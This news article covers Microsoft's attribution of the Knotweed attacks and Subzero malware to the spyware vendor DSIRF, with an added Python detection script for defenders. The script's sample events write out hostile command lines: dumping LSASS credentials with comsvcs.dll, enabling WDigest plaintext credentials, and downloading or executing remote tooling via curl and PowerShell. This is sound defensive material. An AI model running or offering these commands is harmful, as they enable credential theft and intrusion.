Microsoft has linked a threat group it tracks as Knotweed to DSIRF, an Austrian spyware vendor that also operates as a cyber mercenary outfit and targets European and Central American entities with a malware toolset dubbed Subzero.
On its website, DSIRF promotes itself as a company that provides information research, forensics, and data-driven intelligence services to corporations.
However, it has been linked to the development of the Subzero malware that its customers can use to hack targets’ phones, computers, and network and internet-connected devices.
Using passive DNS data while investigating Knotweed attacks, threat intelligence firm RiskIQ also found infrastructure that had been actively serving malware since February 2020 and that linked back to DSIRF, including the company's official website and domains likely used to debug and stage the Subzero malware.
The Microsoft Threat Intelligence Center (MSTIC) has also found multiple links between DSIRF and malicious tools used in Knotweed’s attacks.
“These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF,” Microsoft said.
Some Knotweed attacks observed by Microsoft have targeted law firms, banks, and strategic consultancy organizations in countries including Austria, the United Kingdom, and Panama.
“As part of our investigation into the utility of this malware, Microsoft’s communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity,” Microsoft added.
“Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama.”
Subzero malware and zero-day exploits
On compromised devices, the attackers deployed Corelump, the primary payload that runs from memory to evade detection, and Jumplump, a heavily obfuscated malware loader that downloads and loads Corelump into memory.
The primary Subzero payload has many capabilities, including keylogging, capturing screenshots, exfiltrating data, and running remote shells and arbitrary plugins downloaded from its command-and-control server.
On systems where Knotweed deployed its malware, Microsoft has observed a variety of post-compromise actions, including:
- Setting the WDigest registry value UseLogonCredential to 1 so that LSASS keeps plaintext credentials in memory
- Dumping credentials from LSASS memory via the MiniDump export of comsvcs.dll
- Attempting to access email accounts with the dumped credentials from a Knotweed-controlled IP address
- Using curl to download Knotweed tooling from public file shares such as vultrobjects[.]com
- Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF
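The post-compromise actions above are all visible in ordinary endpoint telemetry (registry-set and process-creation events), so they make good hunting rules. The following is an added example, not code from Microsoft's report or from DSIRF: four rules run over a handful of constructed event records that mimic Sysmon EventID 13 (registry value set) and EventID 1 / Security 4688 (process creation). The event field names (`kind`, `path`, `value`, `image`, `cmdline`) are an assumption and must be mapped from your own SIEM schema; the hostnames, PIDs, bucket name and gist URL are made up. The comsvcs rule also catches the `#24` ordinal form of the MiniDump export, which is a common way to avoid the literal string in the command line.

```python
import re

# Constructed sample events (not real telemetry). Field names are an assumption;
# map them from Sysmon EventID 13 / EventID 1 or Security 4657 / 4688 in practice.
SAMPLE_EVENTS = [
    {"host": "ws01", "kind": "registry_set",
     "path": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "value": "DWORD (0x00000001)"},
    {"host": "ws01", "kind": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Windows\Temp\l.dmp full"},
    {"host": "ws02", "kind": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe comsvcs.dll, #24 704 C:\Temp\out.dmp full"},  # ordinal form of MiniDump
    {"host": "ws02", "kind": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -s -o C:\\Users\\Public\\svc.exe https://example-bucket.vultrobjects.com/tools/svc.exe"},
    {"host": "ws02", "kind": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -c \"iex (iwr https://gist.githubusercontent.com/someuser/0123abcd/raw/run.ps1)\""},
    # Benign look-alikes that must not alert
    {"host": "ws03", "kind": "registry_set",
     "path": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "value": "DWORD (0x00000000)"},
    {"host": "ws03", "kind": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -s https://www.example.com/status"},
]

URL_HOST = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)


def _dword(value):
    """Parse a registry DWORD written as Sysmon does ('DWORD (0x00000001)') or as a plain number."""
    m = re.search(r"0x([0-9a-f]+)", str(value), re.IGNORECASE)
    if m:
        return int(m.group(1), 16)
    try:
        return int(str(value), 0)
    except ValueError:
        return None


def rule_wdigest_plaintext(ev):
    """UseLogonCredential set to 1: WDigest will keep plaintext credentials in LSASS memory."""
    if ev.get("kind") != "registry_set":
        return None
    if not ev.get("path", "").lower().endswith(r"\wdigest\uselogoncredential"):
        return None
    return "wdigest_plaintext_creds" if _dword(ev.get("value")) == 1 else None


def rule_comsvcs_minidump(ev):
    """comsvcs.dll MiniDump (by name or by its ordinal, #24) used to dump a process such as LSASS."""
    cmd = ev.get("cmdline", "").lower()
    if ev.get("kind") == "process" and "comsvcs.dll" in cmd and ("minidump" in cmd or "#24" in cmd):
        return "lsass_dump_comsvcs"
    return None


def rule_curl_public_share(ev, suspicious_suffixes=(".vultrobjects.com",)):
    """curl.exe fetching from a public object-storage host used for tool staging."""
    if ev.get("kind") != "process" or not ev.get("image", "").lower().endswith("curl.exe"):
        return None
    for host in URL_HOST.findall(ev.get("cmdline", "")):
        if host.lower().endswith(suspicious_suffixes):
            return "curl_download_public_share"
    return None


def rule_powershell_from_gist(ev):
    """PowerShell pulling a script straight from a GitHub gist on the command line."""
    if ev.get("kind") != "process" or "powershell" not in ev.get("image", "").lower():
        return None
    hosts = [h.lower() for h in URL_HOST.findall(ev.get("cmdline", ""))]
    hit = any(h == "gist.githubusercontent.com" or h == "gist.github.com" for h in hosts)
    return "powershell_exec_from_gist" if hit else None


RULES = (rule_wdigest_plaintext, rule_comsvcs_minidump, rule_curl_public_share, rule_powershell_from_gist)


def detect(events):
    """Run every rule over every event; return one alert dict per (event, rule) match."""
    alerts = []
    for ev in events:
        for rule in RULES:
            name = rule(ev)
            if name:
                evidence = ev.get("cmdline") or f"{ev.get('path')} = {ev.get('value')}"
                alerts.append({"host": ev.get("host"), "rule": name, "evidence": evidence})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['host']}: {a['evidence']}")
```

Each rule is deliberately narrow: the registry rule keys on the exact value name and only fires on 1, and the curl rule keys on the destination host suffix rather than on curl itself, which is a legitimate Windows binary. Treat the set as hunting queries to tune against your own baseline, not as a signature list.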
Among the zero-days used in Knotweed campaigns, Microsoft highlights CVE-2022-22047, patched in July 2022, which the attackers used to escalate privileges, escape sandboxes, and gain system-level code execution.
Last year, Knotweed also used an exploit chain made of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201) in conjunction with an Adobe Reader exploit (CVE-2021-28550), all of them patched in June 2021.
In 2021, the cyber mercenary group was also linked to the exploitation of a fourth zero-day, a Windows privilege escalation flaw in the Windows Update Medic Service (CVE-2021-36948) used to force the service to load an arbitrary signed DLL.
To defend against such attacks, Microsoft advises customers to:
- Prioritize patching of CVE-2022-22047.
- Confirm that Microsoft Defender Antivirus is updated to security intelligence update 1.371.503.0 or later to detect the related indicators.
- Use the indicators of compromise published in Microsoft's report to investigate whether they exist in your environment and assess for potential intrusion.
- Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on.
- Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity.
- Review all authentication activity for remote access infrastructure, focusing on accounts configured with single-factor authentication, to confirm the authenticity and investigate any abnormal activity.
“To limit these attacks, we issued a software update to mitigate the use of vulnerabilities and published malware signatures that will protect Windows customers from exploits Knotweed was using to help deliver its malware,” said Cristin Goodwin, General Manager at Microsoft’s Digital Security Unit.
“We are increasingly seeing PSOAs selling their tools to authoritarian governments that act inconsistently with the rule of law and human rights norms, where they are used to target human rights advocates, journalists, dissidents and others involved in civil society,” Goodwin added.